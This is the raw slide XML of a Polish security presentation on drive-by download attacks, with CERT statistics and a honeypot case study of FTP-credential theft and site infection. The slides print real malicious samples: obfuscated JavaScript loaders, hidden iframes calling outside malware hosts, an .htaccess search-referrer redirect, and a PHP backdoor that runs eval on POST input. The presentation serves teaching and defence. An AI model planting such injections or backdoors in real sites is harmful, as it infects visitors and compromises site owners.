                <a:tab algn="l" pos="3868560"/>
                <a:tab algn="l" pos="4317840"/>
                <a:tab algn="l" pos="4767120"/>
                <a:tab algn="l" pos="5216400"/>
                <a:tab algn="l" pos="5665680"/>
                <a:tab algn="l" pos="6114960"/>
                <a:tab algn="l" pos="6564240"/>
                <a:tab algn="l" pos="7013520"/>
                <a:tab algn="l" pos="7462800"/>
                <a:tab algn="l" pos="7912080"/>
                <a:tab algn="l" pos="8361360"/>
                <a:tab algn="l" pos="8810640"/>
                <a:tab algn="l" pos="9259920"/>
                <a:tab algn="l" pos="97092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DejaVu Sans"/>
              </a:rPr>
              <a:t>OVH (AS1627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49400"/>
            <a:ext cx="822636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kala problemu c.d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619280" y="1616040"/>
            <a:ext cx="5896080" cy="39751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766880" y="5754600"/>
            <a:ext cx="543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Źródło: http://www.cert.pl/PDF/Raport_CP_2009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49400"/>
            <a:ext cx="822636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Z życia wzięte (a.k.a. cyferki++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1295280"/>
            <a:ext cx="822636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a przykładzie danych zebranych w okres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VIII 2008 – III 2010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ahoma"/>
              </a:rPr>
              <a:t>44042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(wykryte) zainfekowane plik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233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(wykryte) dome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70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odzajów szkodliwego oprogramowa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49400"/>
            <a:ext cx="822492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Z życia wzięte c.d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0" y="1619280"/>
          <a:ext cx="8820000" cy="39592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53" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1" rot="16200000">
            <a:off x="1425960" y="4842360"/>
            <a:ext cx="193680" cy="1344600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 123840 w 193680"/>
              <a:gd name="textAreaRight" fmla="*/ 194040 w 193680"/>
              <a:gd name="textAreaTop" fmla="*/ 105120 h 1344600"/>
              <a:gd name="textAreaBottom" fmla="*/ 1239480 h 13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5400" y="10800"/>
                  <a:pt x="0" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54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2760" y="55800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 rot="16200000">
            <a:off x="4668120" y="2927160"/>
            <a:ext cx="238320" cy="5219640"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 152280 w 238320"/>
              <a:gd name="textAreaRight" fmla="*/ 238680 w 238320"/>
              <a:gd name="textAreaTop" fmla="*/ 408240 h 5219640"/>
              <a:gd name="textAreaBottom" fmla="*/ 481140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5400" y="10800"/>
                  <a:pt x="0" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54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02080" y="5607000"/>
            <a:ext cx="72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 rot="16200000">
            <a:off x="7809120" y="5021640"/>
            <a:ext cx="193680" cy="986040"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 123840 w 193680"/>
              <a:gd name="textAreaRight" fmla="*/ 194040 w 193680"/>
              <a:gd name="textAreaTop" fmla="*/ 77040 h 986040"/>
              <a:gd name="textAreaBottom" fmla="*/ 909000 h 98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5400" y="10800"/>
                  <a:pt x="0" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54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499520" y="5580000"/>
            <a:ext cx="6858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49400"/>
            <a:ext cx="822492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Z życia wzięte c.d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1295280"/>
            <a:ext cx="822636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895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70840"/>
                <a:tab algn="l" pos="9420120"/>
                <a:tab algn="l" pos="98694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Kwi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2009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895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70840"/>
                <a:tab algn="l" pos="9420120"/>
                <a:tab algn="l" pos="98694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DejaVu Sans"/>
              </a:rPr>
              <a:t>Korea Pn. wystrzeliwuje rakietę Taepodong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895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70840"/>
                <a:tab algn="l" pos="9420120"/>
                <a:tab algn="l" pos="98694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DejaVu Sans"/>
              </a:rPr>
              <a:t>Trzęsienie ziemi w Meksy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895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70840"/>
                <a:tab algn="l" pos="9420120"/>
                <a:tab algn="l" pos="9869400"/>
                <a:tab algn="l" pos="1032192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895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70840"/>
                <a:tab algn="l" pos="9420120"/>
                <a:tab algn="l" pos="98694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ip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2009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895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70840"/>
                <a:tab algn="l" pos="9420120"/>
                <a:tab algn="l" pos="98694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DejaVu Sans"/>
              </a:rPr>
              <a:t>Zamachy terrorystyczne na hotele w Dżakar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895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70840"/>
                <a:tab algn="l" pos="9420120"/>
                <a:tab algn="l" pos="98694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DejaVu Sans"/>
              </a:rPr>
              <a:t>Śmierć Michaela Jacks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895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70840"/>
                <a:tab algn="l" pos="9420120"/>
                <a:tab algn="l" pos="9869400"/>
                <a:tab algn="l" pos="1032192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895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70840"/>
                <a:tab algn="l" pos="9420120"/>
                <a:tab algn="l" pos="98694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aź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2009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895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70840"/>
                <a:tab algn="l" pos="9420120"/>
                <a:tab algn="l" pos="98694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DejaVu Sans"/>
              </a:rPr>
              <a:t>Barack Obama laureatem pokojowej nagrody Nob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895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70840"/>
                <a:tab algn="l" pos="9420120"/>
                <a:tab algn="l" pos="9869400"/>
                <a:tab algn="l" pos="10321920"/>
                <a:tab algn="l" pos="10779120"/>
                <a:tab algn="l" pos="1078056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895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70840"/>
                <a:tab algn="l" pos="9420120"/>
                <a:tab algn="l" pos="98694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ut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2010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33240" indent="-203040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895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70840"/>
                <a:tab algn="l" pos="9420120"/>
                <a:tab algn="l" pos="98694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DejaVu Sans"/>
              </a:rPr>
              <a:t>Igrzyska olimpijskie w Vancou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3240" indent="-203040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895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70840"/>
                <a:tab algn="l" pos="9420120"/>
                <a:tab algn="l" pos="98694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DejaVu Sans"/>
              </a:rPr>
              <a:t>Trzęsienia ziemi na Haiti i w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49400"/>
            <a:ext cx="822492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Z życia wzięte c.d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1260360"/>
            <a:ext cx="9094680" cy="41403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766880" y="5754600"/>
            <a:ext cx="543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Źródło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ert.gov.pl/portal/cer/8/298/Cyberprzestepcy_wykorzystuja_tragedie_narodowa_aktualizacj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49400"/>
            <a:ext cx="822492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Z życia wzięte c.d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1800360"/>
          <a:ext cx="9069480" cy="37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49400"/>
            <a:ext cx="822636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udium przypadk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214200" y="1619280"/>
            <a:ext cx="89283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0360" y="1619280"/>
            <a:ext cx="878364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iara odwiedza zainfekowaną stronę WWW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lware na stronie wykorzystuje błąd w oprogramowaniu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Kradzież danych dostępowych do konta FTP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Zalogowanie się na konto FTP i pobranie plików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danie szkodliwej treści do pobranych plików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granie na serwer FTP zainfekowanych plikó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24800" y="1800360"/>
            <a:ext cx="2160720" cy="3421080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6001" h="9501">
                <a:moveTo>
                  <a:pt x="500" y="9500"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="6000" y="4500"/>
                  <a:pt x="0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 fill="hold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49400"/>
            <a:ext cx="822636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udium przypadku c.d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360360" y="161928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Środowisko testowe honeypot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-20628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DejaVu Sans"/>
              </a:rPr>
              <a:t>VM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-20628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DejaVu Sans"/>
              </a:rPr>
              <a:t>MS Windows XP Professional SP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-20628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DejaVu Sans"/>
              </a:rPr>
              <a:t>Systemowy firew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-20628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DejaVu Sans"/>
              </a:rPr>
              <a:t>AVG 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-20628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DejaVu Sans"/>
              </a:rPr>
              <a:t>Adobe Reader 9.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-20628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DejaVu Sans"/>
              </a:rPr>
              <a:t>MS Internet Explorer 6.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-20628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DejaVu Sans"/>
              </a:rPr>
              <a:t>Capture HPC (The Honeynet Projec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ozkład jaz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0">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/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440" indent="-32076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rive-by download – co to takiego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440" indent="-32076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laczego problem istniej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440" indent="-32076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Kogo dotyczy problem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440" indent="-32076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kala problemu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440" indent="-32076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Z życia wzię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440" indent="-32076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udium przypadku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440" indent="-32076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kodowani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440" indent="-32076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zeciwdziałani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440" indent="-32076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zyszłość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440" indent="-32076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 na to OWAS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49400"/>
            <a:ext cx="822636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udium przypadku c.d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360360" y="161928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1. Ofiara odwiedza zainfekowaną stronę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Gdzie takie znaleźć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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="ccccff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.google.com/safebrowsing/diagnostic?si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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="ccccff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://stopbadware.org/reports/ip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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="ccccff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://stopbadware.org/reports/as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 u="sng">
                <a:solidFill>
                  <a:srgbClr val="ccccff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.malwaredomainlist.com/mdl.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60360" y="5759280"/>
            <a:ext cx="3632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Co się dzieje na tym etapi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 fill="hold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49400"/>
            <a:ext cx="822636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udium przypadku c.d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63640" y="1182600"/>
            <a:ext cx="5715000" cy="45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49400"/>
            <a:ext cx="822636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udium przypadku c.d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360360" y="161928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2. Malware na stronie wykorzystuje błędy w oprogramowani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Przeglądarki (głównie IE, FX, Oper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Wtyczki (Adobe Reader, RealPlayer, ActiveX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Silniki skryptowe (np. SeaMonkey, JScript, Rhin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No dobrze, i co dalej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 fill="hold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49400"/>
            <a:ext cx="822636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udium przypadku c.d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360360" y="161928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114560"/>
            <a:ext cx="9144000" cy="50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49400"/>
            <a:ext cx="822636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udium przypadku c.d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360360" y="161928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1260360"/>
            <a:ext cx="9144000" cy="48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49400"/>
            <a:ext cx="822636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udium przypadku c.d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360360" y="161928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260360"/>
            <a:ext cx="9144000" cy="48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49400"/>
            <a:ext cx="822636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udium przypadku c.d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360360" y="161928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1260360"/>
            <a:ext cx="9144000" cy="48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49400"/>
            <a:ext cx="822636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udium przypadku c.d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360360" y="161928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Efek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893880" y="2139840"/>
            <a:ext cx="7207200" cy="39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49400"/>
            <a:ext cx="822636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udium przypadku c.d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360360" y="161928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Co nas uderzył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DejaVu Sans"/>
              </a:rPr>
              <a:t>Trojan FakeR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Co robi ten troja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DejaVu Sans"/>
              </a:rPr>
              <a:t>Win32/FakeRean podszywa się pod oprogramowanie antywirusowe i wyświetl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DejaVu Sans"/>
              </a:rPr>
              <a:t>nieprawdziwe informacje o zainfekowanych plikach w systemie. Następnie informuj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DejaVu Sans"/>
              </a:rPr>
              <a:t>użytkownika o tym, że musi on zapłacić za usunięcie zagrożeń, które nie istniej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Gdzie znajdę więcej informacji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ahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Nam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DejaVu Sans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DejaVu Sans"/>
              </a:rPr>
              <a:t>Win32%2fFakeR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49400"/>
            <a:ext cx="822636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udium przypadku c.d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360360" y="161928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3. Kradzież danych dostępowych do konta FTP (i nie tylk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Sniff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Keylogg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Serwery prox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Zapamiętywanie haseł w aplikacj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49400"/>
            <a:ext cx="822492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rive-by download – co to takiego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6840" y="1295280"/>
            <a:ext cx="82249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branie z sieci szkodliwego oprogramowania bez zgody i/lub wiedzy użytkownika</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="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969696"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="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969696"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="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49400"/>
            <a:ext cx="822636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udium przypadku c.d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360360" y="161928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4. Zalogowanie się na konto FTP i pobranie plikó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DejaVu Sans"/>
              </a:rPr>
              <a:t>Jan 9 16:51:00 foo pure-ftpd: (?@x.x.x.x) [INFO] New connection from x.x.x.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DejaVu Sans"/>
              </a:rPr>
              <a:t>Jan 9 16:51:00 foo pure-ftpd: (?@x.x.x.x) [INFO] ftpuser is now logged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DejaVu Sans"/>
              </a:rPr>
              <a:t>Jan 9 16:51:01 foo pure-ftpd: (ftpuser@x.x.x.x) [NOTICE] /srv/www/foo/index.html downloa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DejaVu Sans"/>
              </a:rPr>
              <a:t>Jan 9 16:51:01 foo pure-ftpd: (ftpuser@x.x.x.x) [NOTICE] /srv/www/foo/index.php downloa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DejaVu Sans"/>
              </a:rPr>
              <a:t>Jan 9 16:51:01 foo pure-ftpd: (ftpuser@x.x.x.x) [NOTICE] /srv/www/foo/bar/index.html downloa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DejaVu Sans"/>
              </a:rPr>
              <a:t>Jan 9 16:51:02 foo pure-ftpd: (ftpuser@x.x.x.x) [NOTICE] /srv/www/foo/tmp/index.htm downloa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DejaVu Sans"/>
              </a:rPr>
              <a:t>(..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DejaVu Sans"/>
              </a:rPr>
              <a:t>Jan 9 16:51:03 foo pure-ftpd: (ftpuser@x.x.x.x) [INFO] Log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49400"/>
            <a:ext cx="822636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udium przypadku c.d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161928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5. Dodanie szkodliwej treści do pobranych plikó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Prz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“&lt;html&gt;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“&lt;body&gt;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P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“&lt;/html&gt;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Gdziekolwiek ucinając resztę zawartości pli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49400"/>
            <a:ext cx="822636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udium przypadku c.d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324000" y="161928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5. Dodanie szkodliwej treści do pobranych plikó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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>$ tail -4 index.htm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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>&lt;/BODY&gt;&lt;/HTML&gt;&lt;!-- ad --&gt;&lt;scrip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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>.12312313,1313123+13123.31313,d=(("sdfsfd"?(.45,(.33?("wi"+("re","n")):("dfg",.44,d=5))):(.4,"sdf"))),e=(g="5"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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>(.44,.0,"d"+(.33,(.4?(45./.343,"ow"):("34","34"))))),f=("poc"?(.0?.0:"d"+("43",.3,"oc")):"333"),u=(33?("u"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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>+("z",44.,"m")):33)+("e"+(1,1,5,(.3,"n")+("d","t")));y=(a=(444444444444444444444444,55555555,"rrrrrrrrrrrr","e")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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>b=(.5?"v":("d"?"f":"tt")),c=("33"?(.33/44.,.33,33.,.33,"a"):"z"),g=(("f"),(333/444.,"l")));(ee=eval(a+(55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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>(...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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>("E","e")))+(("a","r")+("woman","man"))+("ad"+("re","ve"))+"rt"+("his",("is"?"is":"a "+"man"))+"i"+("S","ng")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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>(".a",".n")+"et"+("/s","/i")+"n.c"+"gi"+("!!!","?")+("A","3","2")+"&amp;' "+("si","wi")+"d"+"th="+("1","3")+"0 h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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>"+("sig","i"+"g")+"ht=2"+((0,"0")+" s"+("vy","ty"))+"le='v"+("asi",("as","is")+"i")+("b"+(33?"il":"aa"))+"ity:"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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>("bi","hi")+"dd"+("de","en")+"'&gt;&lt;/i"+"fr"+("na"+("you","me"),"a"+("me"?"me":"you"))+"&gt;");}var ahsd78as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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>as6dyasdiashdiayd=true;&lt;/script&gt;&lt;!-- /ad --&gt;&lt;iframe src="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1300" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="ccccff"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://homenameworld.cn:8080/ts/in.cgi?pepsi21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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>"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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>width=12 height=12 style="visibility: hidden"&gt;&lt;/iframe&gt;&lt;iframe src="http://nakulpi.net/?click=457956" wid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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>h=1 height=1 style="visibility:hidden;position:absolute"&gt;&lt;/iframe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DejaVu Sans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49400"/>
            <a:ext cx="822636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udium przypadku c.d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360360" y="161928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6. Wgranie na serwer FTP zainfekowanych plikó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DejaVu Sans"/>
              </a:rPr>
              <a:t>Jan 9 16:52:00 foo pure-ftpd: (?@x.x.x.x) [INFO] New connection from x.x.x.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DejaVu Sans"/>
              </a:rPr>
              <a:t>Jan 9 16:52:00 foo pure-ftpd: (?@x.x.x.x) [INFO] ftpuser is now logged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DejaVu Sans"/>
              </a:rPr>
              <a:t>Jan 9 16:52:01 foo pure-ftpd: (ftpuser@x.x.x.x) [NOTICE] /srv/www/foo/.htaccess uploa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DejaVu Sans"/>
              </a:rPr>
              <a:t>Jan 9 16:52:01 foo pure-ftpd: (ftpuser@x.x.x.x) [NOTICE] /srv/www/foo/index.html uploa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DejaVu Sans"/>
              </a:rPr>
              <a:t>Jan 9 16:52:01 foo pure-ftpd: (ftpuser@x.x.x.x) [NOTICE] /srv/www/foo/index.php uploa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DejaVu Sans"/>
              </a:rPr>
              <a:t>Jan 9 16:52:01 foo pure-ftpd: (ftpuser@x.x.x.x) [NOTICE] /srv/www/foo/bar/.htaccess uploa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DejaVu Sans"/>
              </a:rPr>
              <a:t>Jan 9 16:52:01 foo pure-ftpd: (ftpuser@x.x.x.x) [NOTICE] /srv/www/foo/bar/index.html uploa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DejaVu Sans"/>
              </a:rPr>
              <a:t>Jan 9 16:52:02 foo pure-ftpd: (ftpuser@x.x.x.x) [NOTICE] /srv/www/foo/tmp/jquery.js uploa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DejaVu Sans"/>
              </a:rPr>
              <a:t>(..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DejaVu Sans"/>
              </a:rPr>
              <a:t>Jan 9 16:52:03 foo pure-ftpd: (ftpuser@x.x.x.x) [INFO] Log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49400"/>
            <a:ext cx="822636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udium przypadku c.d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360360" y="161928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6. Wgranie na serwer FTP zainfekowanych plikó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DejaVu Sans"/>
              </a:rPr>
              <a:t>$ cat .ht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DejaVu Sans"/>
              </a:rPr>
              <a:t>RewriteEngine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DejaVu Sans"/>
              </a:rPr>
              <a:t>RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR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DejaVu Sans"/>
              </a:rPr>
              <a:t>RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR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DejaVu Sans"/>
              </a:rPr>
              <a:t>RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR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DejaVu Sans"/>
              </a:rPr>
              <a:t>RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR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DejaVu Sans"/>
              </a:rPr>
              <a:t>RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR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DejaVu Sans"/>
              </a:rPr>
              <a:t>RewriteCond %{HTTP_REFERER} .*yahoo.*$ [N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DejaVu Sans"/>
              </a:rPr>
              <a:t>RewriteRule .* http://x.x.x.x/in.html?s=xx [R,L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49400"/>
            <a:ext cx="822636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zykłady szkodliwego oprogramowani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360360" y="161928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DejaVu Sans"/>
              </a:rPr>
              <a:t>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DejaVu Sans"/>
              </a:rPr>
              <a:t>&lt;iframe src="http://porno-cmc.ru/?partner=1354" width=2 height=2 style="visibility:hidden"&gt;&lt;/ifr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DejaVu Sans"/>
              </a:rPr>
              <a:t>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DejaVu Sans"/>
              </a:rPr>
              <a:t>&lt;?php echo '&lt;iframe src="&amp;#104;&amp;#116;&amp;#116;&amp;#112;&amp;#58;&amp;#47;&amp;#47;&amp;#99;&amp;#100;&amp;#11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DejaVu Sans"/>
              </a:rPr>
              <a:t>&amp;#117;&amp;#118;&amp;#98;&amp;#104;&amp;#102;&amp;#122;&amp;#122;&amp;#46;&amp;#99;&amp;#111;&amp;#109;&amp;#47;&amp;#1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DejaVu Sans"/>
              </a:rPr>
              <a:t>&amp;#108;&amp;#47;&amp;#97;&amp;#100;&amp;#118;&amp;#53;&amp;#57;&amp;#56;&amp;#46;&amp;#112;&amp;#104;&amp;#112;" width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DejaVu Sans"/>
              </a:rPr>
              <a:t>height=1&gt;&lt;/iframe&gt;'; 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DejaVu Sans"/>
              </a:rPr>
              <a:t>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DejaVu Sans"/>
              </a:rPr>
              <a:t>&lt;script&gt;/*GNU GPL*/ try{window.onload = function(){var Z6kdr96vryd = document.create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DejaVu Sans"/>
              </a:rPr>
              <a:t>('s!^(@c&amp;!r)#@i^#p@(@t!!$'.replace(/\$|&amp;|\!|\^|#|@|\)|\(/ig, ''));Z6kdr96vryd.setAttribute('type'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DejaVu Sans"/>
              </a:rPr>
              <a:t>'text/javascript');Z6kdr96vryd.setAttribute('src',  'h^^$t$(^^)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ahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>t@p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DejaVu Sans"/>
              </a:rPr>
              <a:t>((:$$/(&amp;(/&amp;y#e(s!&amp;^!k)y&amp;^#-!c$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DejaVu Sans"/>
              </a:rPr>
              <a:t>$o^m^!(@$.&amp;)n$a!))!u$)k)^$r($i!)&amp;&amp;.#@&amp;c(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ahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>o#$@m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DejaVu Sans"/>
              </a:rPr>
              <a:t>!^.($(t^h@@e^p#@i&amp;@r&amp;a&amp;$t))$^)e!((b@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DejaVu Sans"/>
              </a:rPr>
              <a:t>a@)!&amp;y(@^-@&amp;^#o$&amp;^((r)!)g@&amp;(.#^v!@!@i#^e#&amp;$$w@^^h!!$@)o&amp;m@e@s$)a#$!l^e!^.@r&amp;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DejaVu Sans"/>
              </a:rPr>
              <a:t>u$(:&amp;)8)0!)8()@0)/##c$l$!@(i#c#)k)^!s(o$(#r!@^@&amp;.#!)c@&amp;o^@m!##)/#^!!c!$($l#($i)&amp;c@$&amp;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DejaVu Sans"/>
              </a:rPr>
              <a:t>^^(s!&amp;o!^!&amp;r#!(.)c^^)o&amp;#m&amp;#$/#&amp;^g)u#$$)a#r!&amp;)&amp;&amp;d^^i#)a@!n#$^.#c$@$o$.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ahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>!^!@u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DejaVu Sans"/>
              </a:rPr>
              <a:t>(k(()/)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DejaVu Sans"/>
              </a:rPr>
              <a:t>!g#^!o^^!o!!^g!l)!e&amp;.)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ahoma"/>
                <a:ea typeface="DejaVu Sans"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>c!@o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DejaVu Sans"/>
              </a:rPr>
              <a:t>#)m^/&amp;f##&amp;(i$(^l)(e&amp;#h!i#@p&amp;p^)o(.!^@^c&amp;)&amp;o@(!m!))$/^)'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DejaVu Sans"/>
              </a:rPr>
              <a:t>replace(/\(|\!|\$|\^|\)|#|&amp;|@/ig, ''));Z6kdr96vryd.setAttribute('defer', 'defer');Z6kdr96vryd.setAttrib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DejaVu Sans"/>
              </a:rPr>
              <a:t>('id', 'Q((4^f!#3)#z@#5^)!s!&amp;!f)$^9@2^o$)x@#@$)'.replace(/\$|\)|@|#|\!|&amp;|\(|\^/ig, ''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DejaVu Sans"/>
              </a:rPr>
              <a:t>document.body.appendChild(Z6kdr96vryd);}} catch(e) {}&lt;/scrip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dur="indefinite" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst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dur="indefinite" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="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 fill="hold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 fill="hold"/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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20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0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0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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20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0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0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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20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0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0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 fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20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0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0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 fill="hold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 fill="hold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49400"/>
            <a:ext cx="822636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zykłady szkodliwego oprogramowania c.d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360360" y="1260360"/>
            <a:ext cx="828036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DejaVu Sans"/>
              </a:rPr>
              <a:t>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DejaVu Sans"/>
              </a:rPr>
              <a:t>&lt;!-- o --&gt;&lt;script language='JavaScript'&gt;function nbsp() {v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DejaVu Sans"/>
              </a:rPr>
              <a:t>t,o,l,i,j;v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DejaVu Sans"/>
              </a:rPr>
              <a:t>s='';s+='060047116101120116097116101097062060047116101120116097114101097062'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DejaVu Sans"/>
              </a:rPr>
              <a:t>s+='060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111'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DejaVu Sans"/>
              </a:rPr>
              <a:t>s=s+'110105046099111109047098095116114047105110100101120046112104112034032119105100116104061051032104101'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DejaVu Sans"/>
              </a:rPr>
              <a:t>s=s+'105103104116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082'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DejaVu Sans"/>
              </a:rPr>
              <a:t>s=s+'065077069062032'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DejaVu Sans"/>
              </a:rPr>
              <a:t>t='';l=s.length;i=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DejaVu Sans"/>
              </a:rPr>
              <a:t>while(i&lt;(l-1)){for(j=0;j&lt;3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))&gt;unescape(0x00))t-=-(unescape(0x08)+unescape(0x30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DejaVu Sans"/>
              </a:rPr>
              <a:t>document.write(String.fromCharCode(t));t='';}}nbsp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DejaVu Sans"/>
              </a:rPr>
              <a:t>&lt;/script&gt;&lt;!-- c →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DejaVu Sans"/>
              </a:rPr>
              <a:t>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DejaVu Sans"/>
              </a:rPr>
              <a:t>&lt;?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_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DejaVu Sans"/>
              </a:rPr>
              <a:t>HGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50L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DejaVu Sans"/>
              </a:rPr>
              <a:t>DyaXRlKHVuZXNjYXBlKCdkT3ElM0NzY3JpOWdwRWEydE44SiUyMHNPa3JjRWEyJTNET2slMkYlMkY5Zzk0JTJFMERCMjBEQjRFYTI3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DejaVu Sans"/>
              </a:rPr>
              <a:t>TJFMiUyRTlnMTk1T2slMkZqcW9nMnVOOEplRWEycjEweU9rJTJFMERCanMwREIlM0UlM0NPayUyRnNjcmlwdCUzRScpLnJlcGxhY2U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DejaVu Sans"/>
              </a:rPr>
              <a:t>L044Snw5Z3xFYTJ8MERCfGRPcXxvZzJ8MTB8T2svZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(subs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DejaVu Sans"/>
              </a:rPr>
              <a:t>($s,0,2)==chr(31).chr(139)));$s=gzinflate(substr($s,10,-8));if(preg_match_all('#&lt;script(.*?)&lt;/script&gt;#is',$s,$a))foreach($a[0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DejaVu Sans"/>
              </a:rPr>
              <a:t>as $v)if(count(explode("\n",$v))&gt;5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/&lt;&gt;\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,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DejaVu Sans"/>
              </a:rPr>
              <a:t>{20,}#',$v);if((preg_match('#\beval\b#',$v)&amp;&amp;($e||strpos($v,'fromCharCode')))||($e&amp;&amp;strpos($v,'document.write')))$s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DejaVu Sans"/>
              </a:rPr>
              <a:t>str_replace($v,'',$s);}$s1=preg_replace('#&lt;script language=javascript&gt;&lt;!-- \ndocument\.write\(unescape\(.+?\n --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DejaVu Sans"/>
              </a:rPr>
              <a:t>#','',$s);if(stristr($s,'&lt;body'))$s=preg_replace('#(\s*&lt;body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'&lt;/body'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DejaVu Sans"/>
              </a:rPr>
              <a:t>||stristr($s,'&lt;/title&gt;&lt;iframe src="http://cutlot.cn/in.cgi?income51" width=1 height=1style="visibility: hidden"&gt;&lt;/iframe&gt;'))$s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DejaVu Sans"/>
              </a:rPr>
